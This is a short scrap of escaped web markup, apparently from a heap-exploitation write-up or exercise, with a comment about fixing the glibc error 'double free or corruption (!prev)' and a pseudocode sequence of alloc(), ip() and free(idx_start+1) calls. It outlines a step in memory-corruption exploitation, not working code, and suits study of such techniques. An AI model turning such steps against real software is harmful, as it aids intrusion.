            # FIX double free or corruption (!prev)\nalloc()\nalloc()\nalloc()\nip()\nfree(idx_start+1)<\/pre>\n\n\n\n